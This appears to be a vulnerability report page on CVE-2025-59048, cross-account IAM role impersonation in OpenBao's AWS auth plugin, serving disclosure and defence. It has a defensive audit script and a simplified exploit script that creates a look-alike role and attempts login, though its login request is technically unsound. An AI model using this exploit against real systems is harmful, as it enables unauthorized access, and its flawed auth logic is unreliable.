Security Vulnerability Report
CVE-2025-59048 CVSS 8.1 HIGH

CVE-2025-59048

Published: 2025-10-23 16:16:43
Last Modified: 2025-12-05 00:33:08

Description

OpenBao's AWS Plugin generates AWS access credentials based on IAM policies. Prior to version 0.1.1, the AWS Plugin is vulnerable to cross-account IAM role impersonation in the AWS auth method. The vulnerability allows an IAM role from an untrusted AWS account to authenticate by impersonating a role with the same name in a trusted account, leading to unauthorized access. This impacts all users of the auth-aws plugin who operate in a multi-account AWS environment where IAM role names may not be unique across accounts. This vulnerability has been patched in version 0.1.1 of the auth-aws plugin. A workaround for this issue involves guaranteeing that IAM role names are unique across all AWS accounts that could potentially interact with your OpenBao environment, and auditing for any duplicate IAM roles.
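The description names two things a defender wants to see concretely: why binding a login role to a bare IAM role name is insufficient in a multi-account estate, and how to run the recommended audit for duplicate role names. The following is an added illustration written for this report; it is not the OpenBao auth-aws plugin's code, and every account ID, role name and ARN in it is a constructed placeholder. It contrasts a name-only match (the class of check the advisory describes as flawed) with a match on account ID plus role name, and adds a small audit that flags role names present in more than one account. It also accepts STS assumed-role ARNs, since that is the identity form a caller presents after assuming a role, which goes slightly beyond the advisory text.

```python
"""Illustration of the CVE-2025-59048 root cause and of the documented
workaround. This is not the OpenBao auth-aws plugin's code; all account IDs,
role names and ARNs below are constructed placeholder values."""
import re
from collections import defaultdict

# Accepts both IAM role ARNs and the STS assumed-role ARNs a caller presents:
#   arn:aws:iam::<account>:role/<optional/path/><name>
#   arn:aws:sts::<account>:assumed-role/<name>/<session>
_ROLE_ARN = re.compile(
    r"^arn:aws:iam::(?P<account>\d{12}):role/(?:[^/]+/)*(?P<name>[^/]+)$"
)
_ASSUMED_ROLE_ARN = re.compile(
    r"^arn:aws:sts::(?P<account>\d{12}):assumed-role/(?P<name>[^/]+)/[^/]+$"
)


def parse_role_identity(arn):
    """Return (account_id, role_name) for a role or assumed-role ARN."""
    m = _ROLE_ARN.match(arn) or _ASSUMED_ROLE_ARN.match(arn)
    if m is None:
        raise ValueError(f"not a role ARN: {arn}")
    return m.group("account"), m.group("name")


def matches_by_name_only(caller_arn, bound_arn):
    """Flawed check: only the role name is compared, so a role with the same
    name in any other account satisfies the binding."""
    return parse_role_identity(caller_arn)[1] == parse_role_identity(bound_arn)[1]


def matches_full_identity(caller_arn, bound_arn):
    """Hardened check: the account ID and the role name must both match."""
    return parse_role_identity(caller_arn) == parse_role_identity(bound_arn)


def find_duplicate_role_names(roles_by_account):
    """Workaround audit: return {role_name: [account_ids]} for every role name
    that exists in more than one account. Input shape is
    {account_id: [role_name, ...]}, as obtained by listing roles per account."""
    accounts_for_name = defaultdict(set)
    for account, names in roles_by_account.items():
        for name in names:
            accounts_for_name[name].add(account)
    return {name: sorted(accts) for name, accts in accounts_for_name.items()
            if len(accts) > 1}


# Constructed sample data (placeholder account IDs, not real accounts)
TRUSTED_ACCOUNT = "111111111111"
UNTRUSTED_ACCOUNT = "222222222222"
BOUND_ROLE_ARN = f"arn:aws:iam::{TRUSTED_ACCOUNT}:role/trusted-role"
LEGIT_CALLER = f"arn:aws:sts::{TRUSTED_ACCOUNT}:assumed-role/trusted-role/ci"
LOOKALIKE_CALLER = f"arn:aws:sts::{UNTRUSTED_ACCOUNT}:assumed-role/trusted-role/x"

SAMPLE_INVENTORY = {
    TRUSTED_ACCOUNT: ["trusted-role", "deploy", "ReadOnly"],
    UNTRUSTED_ACCOUNT: ["trusted-role", "sandbox"],
    "333333333333": ["deploy"],
}

if __name__ == "__main__":
    for label, caller in (("legitimate", LEGIT_CALLER), ("look-alike", LOOKALIKE_CALLER)):
        print(f"{label:11} name-only={matches_by_name_only(caller, BOUND_ROLE_ARN)} "
              f"full-arn={matches_full_identity(caller, BOUND_ROLE_ARN)}")
    print("duplicate role names across accounts:",
          find_duplicate_role_names(SAMPLE_INVENTORY))
```

Run as-is, the look-alike caller passes the name-only check and fails the full-identity check, and the audit reports `trusted-role` and `deploy` as names shared across accounts. In a real audit, feed `find_duplicate_role_names` the role lists from each account that can reach your OpenBao instance and treat every hit as a name to rename or explicitly pin to an account ID in the login binding.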

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:openbao:aws_plugin:*:*:*:*:*:*:*:* - VULNERABLE
OpenBao auth-aws plugin < 0.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59048 PoC - Cross-account IAM Role Impersonation
# This PoC demonstrates the concept of the vulnerability
import boto3
import json
import requests

# Configuration
OPENBAO_URL = "http://target-openbao:8200"
ATTACKER_AWS_ACCOUNT_ID = "123456789012"  # Attacker's AWS account
TARGET_ROLE_NAME = "trusted-role"  # Same name as role in trusted account


def create_iam_role_in_attacker_account():
    """Create an IAM role with the same name as the target role"""
    iam_client = boto3.client('iam')
    trust_policy = {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": {
                    "AWS": f"arn:aws:iam::{ATTACKER_AWS_ACCOUNT_ID}:root"
                },
                "Action": "sts:AssumeRole"
            }
        ]
    }
    try:
        iam_client.create_role(
            RoleName=TARGET_ROLE_NAME,
            AssumeRolePolicyDocument=json.dumps(trust_policy),
            Description="Malicious role for CVE-2025-59048 demonstration"
        )
        print(f"[+] Created IAM role: {TARGET_ROLE_NAME}")
    except iam_client.exceptions.EntityAlreadyExistsException:
        print(f"[*] Role {TARGET_ROLE_NAME} already exists")


def get_aws_identity():
    """Get current AWS identity credentials"""
    sts_client = boto3.client('sts')
    identity = sts_client.get_caller_identity()
    return identity


def authenticate_to_openbao():
    """Attempt to authenticate to OpenBao using the impersonated role"""
    # Assume role to get temporary credentials
    sts_client = boto3.client('sts')
    # Get role credentials (would normally require assuming the role first)
    role_credentials = sts_client.assume_role(
        RoleArn=f"arn:aws:iam::{ATTACKER_AWS_ACCOUNT_ID}:role/{TARGET_ROLE_NAME}",
        RoleSessionName="OpenBao-Exploitation"
    )
    # Generate signed request to OpenBao
    # The vulnerability allows this request from untrusted account to succeed
    auth_data = {
        "role": TARGET_ROLE_NAME,
        "jwt": role_credentials['Credentials']['AccessKeyId']  # Simplified
    }
    response = requests.post(
        f"{OPENBAO_URL}/v1/auth/aws/login",
        json=auth_data
    )
    if response.status_code == 200:
        print("[!] Authentication successful - Vulnerability confirmed!")
        return response.json()
    else:
        print("[-] Authentication failed")
        return None


def main():
    print("CVE-2025-59048 - OpenBao AWS Plugin Cross-account IAM Role Impersonation")
    print("=" * 80)
    # Step 1: Create role in attacker's account
    create_iam_role_in_attacker_account()
    # Step 2: Verify current identity
    identity = get_aws_identity()
    print(f"[*] Current identity: {identity['Arn']}")
    # Step 3: Attempt authentication to OpenBao
    result = authenticate_to_openbao()
    if result:
        print("[+] Received OpenBao token - exploitation successful")
        print(f"    Token: {result.get('auth', {}).get('client_token', 'N/A')[:20]}...")


if __name__ == "__main__":
    main()

References

https://github.com/openbao/openbao-plugins/commit/2a77af36834746ca6d3ac9bd1049154c84b3efae (Patch)
https://github.com/openbao/openbao-plugins/security/advisories/GHSA-jp7h-4f3c-9rc7 (Patch, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-59048",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-23T16:16:43.190",
    "lastModified": "2025-12-05T00:33:07.590",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenBao's AWS Plugin generates AWS access credentials based on IAM policies. Prior to version 0.1.1, the AWS Plugin is vulnerable to cross-account IAM role Impersonation in the AWS auth method. The vulnerability allows an IAM role from an untrusted AWS account to authenticate by impersonating a role with the same name in a trusted account, leading to unauthorized access. This impacts all users of the auth-aws plugin who operate in a multi-account AWS environment where IAM role names may not be unique across accounts. This vulnerability has been patched in version 0.1.1 of the auth-aws plugin. A workaround for this issue involves guaranteeing that IAM role names are unique across all AWS accounts that could potentially interact with your OpenBao environment, and to audit for any duplicate IAM roles."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-694"},
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:openbao:aws_plugin:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "0.1.1",
                "matchCriteriaId": "F8269CFF-93B8-4FF9-B905-D69E7A7F4934"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/openbao/openbao-plugins/commit/2a77af36834746ca6d3ac9bd1049154c84b3efae",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/openbao/openbao-plugins/security/advisories/GHSA-jp7h-4f3c-9rc7",
        "source": "[email protected]",
        "tags": ["Patch", "Vendor Advisory"]
      }
    ]
  }
}